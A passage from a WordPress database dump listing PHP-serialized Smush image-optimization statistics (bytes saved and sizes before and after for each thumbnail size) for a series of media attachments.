\"stats\";a:8:{s:7:\"percent\";d:11.1739569850529267824867929448373615741729736328125;s:5:\"bytes\";i:6302;s:11:\"size_before\";i:56399;s:10:\"size_after\";i:50097;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:167;s:11:\"size_before\";i:2481;s:10:\"size_after\";i:2314;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:506;s:11:\"size_before\";i:5757;s:10:\"size_after\";i:5251;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3491;s:11:\"size_before\";i:23780;s:10:\"size_after\";i:20289;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:252;s:11:\"size_before\";i:3586;s:10:\"size_after\";i:3334;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:649;s:11:\"size_before\";i:8183;s:10:\"size_after\";i:7534;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1237;s:11:\"size_before\";i:12612;s:10:\"size_after\";i:11375;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4470,1228,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.9096270408999078682654726435430347919464111328125;s:5:\"bytes\";i:7259;s:11:\"size_before\";i:73252;s:10:\"size_after\";i:65993;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:200;s:11:\"size_before\";i:2874;s:10:\"size_after\";i:2674;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:549;s:11:\"size_before\";i:6919;s:10:\"size_after\";i:6370;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3922;s:11:\"size_before\";i:30384;s:10:\"size_after\";i:26462;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:310;s:11:\"size_before\";i:4818;s:10:\"size_after\";i:4508;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:797;s:11:\"size_before\";i:11011;s:10:\"size_after\";i:10214;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1481;s:11:\"size_before\";i:17246;s:10:\"size_after\";i:15765;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4471,1227,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.2932787348206726818489187280647456645965576171875;s:5:\"bytes\";i:8098;s:11:\"size_before\";i:56656;s:10:\"size_after\";i:48558;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:270;s:11:\"size_before\";i:2731;s:10:\"size_after\";i:2461;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.5;s:5:\"bytes\";i:695;s:11:\"size_before\";i:6042;s:10:\"size_after\";i:5347;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:4213;s:11:\"size_before\";i:23642;s:10:\"size_after\";i:19429;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:386;s:11:\"size_before\";i:3629;s:10:\"size_after\";i:3243;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:904;s:11:\"size_before\";i:8185;s:10:\"size_after\";i:7281;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1630;s:11:\"size_before\";i:12427;s:10:\"size_after\";i:10797;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4472,1226,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.5247769746695301051886417553760111331939697265625;s:5:\"bytes\";i:8308;s:11:\"size_before\";i:61428;s:10:\"size_after\";i:53120;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:287;s:11:\"size_before\";i:2815;s:10:\"size_after\";i:2528;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:698;s:11:\"size_before\";i:6262;s:10:\"size_after\";i:5564;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:4269;s:11:\"size_before\";i:25608;s:10:\"size_after\";i:21339;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:393;s:11:\"size_before\";i:3997;s:10:\"size_after\";i:3604;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:945;s:11:\"size_before\";i:8898;s:10:\"size_after\";i:7953;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1716;s:11:\"size_before\";i:13848;s:10:\"size_after\";i:12132;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4473,1225,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.2932787348206726818489187280647456645965576171875;s:5:\"bytes\";i:8098;s:11:\"size_before\";i:56656;s:10:\"size_after\";i:48558;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:270;s:11:\"size_before\";i:2731;s:10:\"size_after\";i:2461;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.5;s:5:\"bytes\";i:695;s:11:\"size_before\";i:6042;s:10:\"size_after\";i:5347;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:4213;s:11:\"size_before\";i:23642;s:10:\"size_after\";i:19429;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:386;s:11:\"size_before\";i:3629;s:10:\"size_after\";i:3243;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:904;s:11:\"size_before\";i:8185;s:10:\"size_after\";i:7281;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1630;s:11:\"size_before\";i:12427;s:10:\"size_after\";i:10797;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4474,1224,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.37884100348035332217477844096720218658447265625;s:5:\"bytes\";i:7249;s:11:\"size_before\";i:77291;s:10:\"size_after\";i:70042;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:7;s:5:\"bytes\";i:217;s:11:\"size_before\";i:3101;s:10:\"size_after\";i:2884;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.69000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:571;s:11:\"size_before\";i:7426;s:10:\"size_after\";i:6855;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:3840;s:11:\"size_before\";i:31595;s:10:\"size_after\";i:27755;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:312;s:11:\"size_before\";i:5114;s:10:\"size_after\";i:4802;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:810;s:11:\"size_before\";i:11698;s:10:\"size_after\";i:10888;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1499;s:11:\"size_before\";i:18357;s:10:\"size_after\";i:16858;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4475,1223,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.57199114662680727860788465477526187896728515625;s:5:\"bytes\";i:6660;s:11:\"size_before\";i:69578;s:10:\"size_after\";i:62918;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.63999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:199;s:11:\"size_before\";i:2996;s:10:\"size_after\";i:2797;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:501;s:11:\"size_before\";i:6996;s:10:\"size_after\";i:6495;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:3700;s:11:\"size_before\";i:29319;s:10:\"size_after\";i:25619;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:260;s:11:\"size_before\";i:4299;s:10:\"size_after\";i:4039;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:635;s:11:\"size_before\";i:10138;s:10:\"size_after\";i:9503;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1365;s:11:\"size_before\";i:15830;s:10:\"size_after\";i:14465;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4476,1222,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.959729440338460193515857099555432796478271484375;s:5:\"bytes\";i:9159;s:11:\"size_before\";i:76582;s:10:\"size_after\";i:67423;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:323;s:11:\"size_before\";i:3162;s:10:\"size_after\";i:2839;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:822;s:11:\"size_before\";i:7481;s:10:\"size_after\";i:6659;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:4495;s:11:\"size_before\";i:30960;s:10:\"size_after\";i:26465;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.2799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:487;s:11:\"size_before\";i:5246;s:10:\"size_after\";i:4759;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1125;s:11:\"size_before\";i:11675;s:10:\"size_after\";i:10550;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1907;s:11:\"size_before\";i:18058;s:10:\"size_after\";i:16151;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4477,1221,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.695578996809988581162542686797678470611572265625;s:5:\"bytes\";i:7509;s:11:\"size_before\";i:51097;s:10:\"size_after\";i:43588;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:239;s:11:\"size_before\";i:2170;s:10:\"size_after\";i:1931;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:616;s:11:\"size_before\";i:5103;s:10:\"size_after\";i:4487;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:3917;s:11:\"size_before\";i:21797;s:10:\"size_after\";i:17880;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:360;s:11:\"size_before\";i:3167;s:10:\"size_after\";i:2807;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:829;s:11:\"size_before\";i:7403;s:10:\"size_after\";i:6574;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1548;s:11:\"size_before\";i:11457;s:10:\"size_after\";i:9909;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4478,1220,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.1064186655393886127285441034473478794097900390625;s:5:\"bytes\";i:8878;s:11:\"size_before\";i:73333;s:10:\"size_after\";i:64455;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:274;s:11:\"size_before\";i:2756;s:10:\"size_after\";i:2482;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:714;s:11:\"size_before\";i:6757;s:10:\"size_after\";i:6043;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4489;s:11:\"size_before\";i:30473;s:10:\"size_after\";i:25984;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:444;s:11:\"size_before\";i:4808;s:10:\"size_after\";i:4364;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1052;s:11:\"size_before\";i:11100;s:10:\"size_after\";i:10048;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1905;s:11:\"size_before\";i:17439;s:10:\"size_after\";i:15534;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4479,1219,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.6544637516678672994885346270166337490081787109375;s:5:\"bytes\";i:6295;s:11:\"size_before\";i:65203;s:10:\"size_after\";i:58908;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.94000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:182;s:11:\"size_before\";i:3062;s:10:\"size_after\";i:2880;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:517;s:11:\"size_before\";i:6884;s:10:\"size_after\";i:6367;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:3485;s:11:\"size_before\";i:27072;s:10:\"size_after\";i:23587;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:235;s:11:\"size_before\";i:4162;s:10:\"size_after\";i:3927;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:648;s:11:\"size_before\";i:9498;s:10:\"size_after\";i:8850;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1228;s:11:\"size_before\";i:14525;s:10:\"size_after\";i:13297;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4480,1218,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.9190340508364602811752774869091808795928955078125;s:5:\"bytes\";i:7032;s:11:\"size_before\";i:70894;s:10:\"size_after\";i:63862;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:196;s:11:\"size_before\";i:3236;s:10:\"size_after\";i:3040;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:577;s:11:\"size_before\";i:7330;s:10:\"size_after\";i:6753;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:3755;s:11:\"size_before\";i:28798;s:10:\"size_after\";i:25043;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:288;s:11:\"size_before\";i:4792;s:10:\"size_after\";i:4504;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:747;s:11:\"size_before\";i:10550;s:10:\"size_after\";i:9803;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1469;s:11:\"size_before\";i:16188;s:10:\"size_after\";i:14719;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4481,1191,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.25079715732655305515663712867535650730133056640625;s:5:\"bytes\";i:3240;s:11:\"size_before\";i:143949;s:10:\"size_after\";i:140709;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.25;s:5:\"bytes\";i:3240;s:11:\"size_before\";i:143949;s:10:\"size_after\";i:140709;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}}}'),(4482,1190,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.63460689496548017274335506954230368137359619140625;s:5:\"bytes\";i:12493;s:11:\"size_before\";i:269559;s:10:\"size_after\";i:257066;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:369;s:11:\"size_before\";i:6284;s:10:\"size_after\";i:5915;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:540;s:11:\"size_before\";i:11129;s:10:\"size_after\";i:10589;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2680;s:11:\"size_before\";i:58859;s:10:\"size_after\";i:56179;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:4214;s:11:\"size_before\";i:96421;s:10:\"size_after\";i:92207;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:620;s:11:\"size_before\";i:11758;s:10:\"size_after\";i:11138;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:5;s:5:\"bytes\";i:1607;s:11:\"size_before\";i:32134;s:10:\"size_after\";i:30527;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2463;s:11:\"size_before\";i:52974;s:10:\"size_after\";i:50511;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4483,1189,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.63460689496548017274335506954230368137359619140625;s:5:\"bytes\";i:12493;s:11:\"size_before\";i:269559;s:10:\"size_after\";i:257066;s:4:\"time\";d:0.12000000000000000943689570931383059360086917877197265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:369;s:11:\"size_before\";i:6284;s:10:\"size_after\";i:5915;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:540;s:11:\"size_before\";i:11129;s:10:\"size_after\";i:10589;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2680;s:11:\"size_before\"